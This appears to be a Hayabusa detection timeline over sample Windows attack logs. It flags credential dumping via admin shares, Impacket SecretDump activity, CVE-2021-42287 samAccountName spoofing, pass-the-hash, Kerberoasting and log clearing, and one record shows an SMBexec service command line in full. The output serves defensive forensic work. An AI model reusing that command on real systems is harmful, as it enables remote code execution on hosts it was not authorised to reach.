20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx +2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 
0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files 
access via network share.evtx +2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,,New Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.690 
